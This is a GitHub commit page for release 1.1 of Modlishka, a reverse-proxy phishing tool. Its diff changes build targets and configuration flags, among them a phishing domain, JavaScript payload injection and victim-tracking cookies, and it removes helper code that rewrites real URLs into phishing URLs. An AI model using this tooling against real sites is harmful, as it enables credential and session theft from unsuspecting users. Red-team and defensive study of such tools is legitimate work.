Skip to content
Permalink
Browse files

Release 1.1

  • Loading branch information...
drk1wi committed May 12, 2019
1 parent 49bc2eb commit 473335b7ace16e29abde12113ab9f67f55432522
Showing 541 changed files with 24,262 additions and 121,779 deletions.
@@ -33,8 +33,10 @@ deps:


build_linux: test linux
build_freebsd: test freebsd
build_linux_xgo: test linux
build_windows: test windows
build_windows_xgo: test windows
build_freebsd: test freebsd

linux:
GOOS=linux GOARCH=amd64 $(GOBUILD) -ldflags "-s -w" -o $(DIST_DIR)/$(BINARY_LINUX) $(MAIN_FILE)
@@ -44,3 +46,12 @@ windows:

freebsd:
GOOS=freebsd GOARCH=amd64 $(GOBUILD) -ldflags "-s -w" -o $(DIST_DIR)/$(BINARY_BSD) $(MAIN_FILE)

linux_xgo:
xgo --targets=linux/amd64 --dest $(DIST_DIR)/ ./

windows_xgo:
xgo --targets=windows/amd64 --dest $(DIST_DIR)/ ./

freebsd_xgo:
xgo --targets=freebsd/amd64 --dest $(DIST_DIR)/ ./
@@ -25,7 +25,6 @@ import (

type Options struct {
PhishingDomain *string `json:"phishingDomain"`
ListeningPort *string `json:"listeningPort"`
ListeningAddress *string `json:"listeningAddress"`
Target *string `json:"target"`
TargetRes *string `json:"targetResources"`
@@ -35,11 +34,12 @@ type Options struct {
TerminateRedirectUrl *string `json:"terminateRedirectUrl"`
TrackingCookie *string `json:"trackingCookie"`
TrackingParam *string `json:"trackingParam"`
ForceHttps *bool `json:"forceHttps"`
UseTls *bool `json:"useTls"`
Debug *bool `json:"debug"`
ForceHTTPS *bool `json:"forceHTTPS"`
ForceHTTP *bool `json:"forceHTTP"`
LogPostOnly *bool `json:"logPostOnly"`
DisableSecurity *bool `json:"disableSecurity"`
DynamicMode *bool `json:"dynamicMode"`
LogFile *string `json:"log"`
Plugins *string `json:"plugins"`
*TLSConfig
@@ -53,31 +53,31 @@ type TLSConfig struct {

var (
C = Options{
PhishingDomain: flag.String("phishingDomain", "", "Phishing domain to create - Ex.: target.co"),
ListeningPort: flag.String("listeningPort", "443", "Listening port"),
ListeningAddress: flag.String("listeningAddress", "127.0.0.1", "Listening address"),
Target: flag.String("target", "", "Main target to proxy - Ex.: https://target.com"),
PhishingDomain: flag.String("phishingDomain", "", "Proxy domain name that will be used - e.g.: proxy.tld"),
ListeningAddress: flag.String("listeningAddress", "127.0.0.1", "Listening address - e.g.: 0.0.0.0 "),
Target: flag.String("target", "", "Target domain name - e.g.: target.tld"),
TargetRes: flag.String("targetRes", "",
"Comma separated list of extra target subdomains that need to pass through the reverse proxy - example: static.target.com"),
"Comma separated list of domains that were not translated automatically. Use this to force domain translation - example: static.target.tld"),
TerminateTriggers: flag.String("terminateTriggers", "",
"Comma separated list of URLs from target's origin which will trigger session termination"),
"Session termination: Comma separated list of URLs from target's origin which will trigger session termination"),
TerminateRedirectUrl: flag.String("terminateUrl", "",
"URL to redirect the client after session termination triggers"),
TargetRules: flag.String("targetRules", "",
"Comma separated list of 'string' patterns and their replacements. Example base64(new):base64(old),"+
"URL to which a client will be redirected after Session Termination rules trigger"),
TargetRules: flag.String("rules", "",
"Comma separated list of 'string' patterns and their replacements - e.g.: base64(new):base64(old),"+
"base64(newer):base64(older)"),
JsRules: flag.String("jsRules", "", "Comma separated list of URL patterns and JS base64 encoded payloads that will be injected. Example google.com:base64(alert(1)),..,etc"),
JsRules: flag.String("jsRules", "", "Comma separated list of URL patterns and JS base64 encoded payloads that will be injected - e.g.: target.tld:base64(alert(1)),..,etc"),

TrackingCookie: flag.String("trackingCookie", "id", "Name of the HTTP cookie used to track the victim"),
TrackingParam: flag.String("trackingParam", "id", "Name of the HTTP parameter used to track the victim"),
TrackingCookie: flag.String("trackingCookie", "id", "Name of the HTTP cookie used for track the client"),
TrackingParam: flag.String("trackingParam", "id", "Name of the HTTP parameter used to set up the HTTP cookie tracking of the client"),
Debug: flag.Bool("debug", false, "Print extra debug information"),
DisableSecurity: flag.Bool("disableSecurity", false, "Disable proxy security features like anti-SSRF. 'Here be dragons' - disable at your own risk."),
DynamicMode: flag.Bool("dynamicMode", false, "Enable dynamic mode for 'Client Domain Hooking'"),

UseTls: flag.Bool("tls", false, "Enable TLS"),
ForceHttps: flag.Bool("forceHttps", false, "Force convert links from http to https"),
Debug: flag.Bool("debug", false, "Print debug information"),
DisableSecurity: flag.Bool("disableSecurity", false, "Disable security features like anti-SSRF. Disable at your own risk."),
ForceHTTP: flag.Bool("forceHTTP", false, "Strip all TLS from the traffic and proxy through HTTP only"),
ForceHTTPS: flag.Bool("forceHTTPS", false, "Strip all clear-text from the traffic and proxy through HTTPS only"),

LogPostOnly: flag.Bool("postOnly", false, "Log only HTTP POST requests"),
LogFile: flag.String("log", "", "Local file to which fetched requests will be written (appended)"),
LogPostOnly: flag.Bool("postOnly", false, "Log only HTTP POST requests"),

Plugins: flag.String("plugins", "all", "Comma separated list of enabled plugin names"),
}
@@ -107,7 +107,7 @@ func ParseConfiguration() Options {
if len(*s.TLSCertificate) > 0 || len(*s.TLSKey) > 0 || len(*s.TLSPool) > 0 {

// Handle TLS Certificates
if *C.UseTls {
if *C.ForceHTTP == false {
if len(*C.TLSCertificate) > 0 {
decodedCertificate, err := base64.StdEncoding.DecodeString(*C.TLSCertificate)
if err == nil {
@@ -162,23 +162,41 @@ func (c *Options) parseJSON(file string) {

func (c *Options) VerifyConfiguration() {

if *c.UseTls == false {

if *c.ForceHTTP == true {
if len(*c.PhishingDomain) == 0 || len(*c.PhishingDomain) == 0 {
log.Warningf("Missing required configuration to start the proxy . Terminating.")
log.Warningf("Missing required parameters in oder start the proxy. Terminating.")
log.Warningf("TIP: You will need to specify at least the following parameters to serve the page over HTTP: phishing and target.")
flag.PrintDefaults()
os.Exit(1)
}
} else { // default + HTTPS wrapper

if len(*c.PhishingDomain) == 0 || len(*c.PhishingDomain) == 0 {
log.Warningf("Missing required parameters in oder start the proxy. Terminating.")
log.Warningf("TIP: You will need to specify at least the following parameters to serve the page over HTTP: phishing and target.")
flag.PrintDefaults()
os.Exit(1)
}


}

if *c.UseTls == true {
if len(*c.PhishingDomain) == 0 || len(*c.PhishingDomain) == 0 || c.TLSCertificate == nil || c.TLSKey == nil {
log.Warningf("Missing required configuration to start the proxy . Terminating.")
log.Warningf("Tip: You will need to specify at least the following parameters to serve the page over HTTPS : phishing, target, cert and certKey.")
flag.PrintDefaults()
os.Exit(1)
}

if *c.DynamicMode == true {
log.Warningf("Dynamic Mode enabled: Proxy will accept and hook all incoming HTTP requests.")
}



if *c.ForceHTTP == true {
log.Warningf("Force HTTP wrapper enabled: Proxy will strip all TLS traffic and handle requests over HTTP only")
}

if *c.ForceHTTPS == true {
log.Warningf("Force HTTPS wrapper enabled: Proxy will strip all clear-text traffic and handle requests over HTTPS only")
}




}
@@ -18,14 +18,8 @@ import (
"bytes"
"compress/flate"
"compress/gzip"
"fmt"
"github.com/drk1wi/Modlishka/runtime"
"net/http"
"net/url"
"regexp"
"strings"

"github.com/drk1wi/Modlishka/log"
"github.com/miekg/dns"
)

//GZIP content
@@ -71,128 +65,6 @@ func Redirect(w http.ResponseWriter, r *http.Request, url string) {
if len(url) > 0 {
http.Redirect(w, r, url, 301)
} else {
http.Redirect(w, r, "http://"+TopLevelDomain, 301)
}
}

//check if the requested URL matches termination URLS patterns and returns verdict
func CheckTermination(input string) bool {

if len(TerminateTriggers) > 0 {
for _, pattern := range TerminateTriggers {
if strings.Contains(input, pattern) {
return true
}
}
}
return false
}

func TranslateRequestHost(newTarget, host string) string {

sub := strings.Replace(host, PhishingDomain, "", -1)
if sub != "" {
log.Debugf("Subdomain: %s ", sub[:len(sub)-1])

decoded, err := DecodeSubdomain(sub[:len(sub)-1])
if err == nil {
if _, ok := dns.IsDomainName(string(decoded)); ok {
log.Debugf("Subdomain contains encrypted base32 domain: %s ", string(decoded))
newTarget = "https://" + string(decoded)
}

} else { //not hex encoded, treat as normal subdomain
log.Debugf("Standard subdomain: %s ", sub[:len(sub)-1])
newTarget = "https://" + sub[:len(sub)-1] + "." + TopLevelDomain
}
}

return newTarget
}

func TranslateSetCookie(cookie string) string {
ret := RegexpSetCookie.ReplaceAllStringFunc(cookie, RealURLtoPhish)

return ret

}
func RealURLtoPhish(realURL string) string {

//var domain string
var host string
var out string

decoded := fmt.Sprintf("%s", realURL)
u, _ := url.Parse(decoded)
out = realURL

if u.Host != "" {
host = u.Host
} else {
host = realURL
}

if strings.Contains(realURL, TopLevelDomain) { //subdomain in main domain
out = strings.Replace(out, string(TopLevelDomain), PhishingDomain, 1)
} else if realURL != "" {
encoded, _ := EncodeSubdomain(host)
out = strings.Replace(out, host, encoded+"."+PhishingDomain, 1)
http.Redirect(w, r, "http://"+runtime.TopLevelDomain, 301)
}

return out
}

func PhishURLToRealURL(phishURL string) string {

//var domain string

var host string
var out string

u, _ := url.Parse(phishURL)
out = phishURL

// Parse both cases with http url scheme and without
if u.Host != "" {
host = u.Host
} else {
host = phishURL
}

if strings.Contains(phishURL, PhishingDomain) {
subdomain := strings.Replace(host, "."+PhishingDomain, "", 1)
// has subdomain
if len(subdomain) > 0 {
decodedDomain, err := DecodeSubdomain(subdomain)
if err != nil {
return strings.Replace(out, PhishingDomain, TopLevelDomain, 1)
}

return string(decodedDomain)
}

return strings.Replace(out, PhishingDomain, TopLevelDomain, -1)
}

return out
}

func StripProtocol(URL string) string {
var re = regexp.MustCompile(`^(http|https)://`)
return re.ReplaceAllString(URL, "")
}

// returns JS payload based on a pattern
func GetJSRulesPayload(input string) string {

if len(JSInjectStrings) > 0 {

for key, _ := range JSInjectStrings {
if strings.Contains(input, key) {
return JSInjectStrings[key]
}
}
}

return ""
}
}

0 comments on commit 473335b

Please sign in to comment.
You can’t perform that action at this time.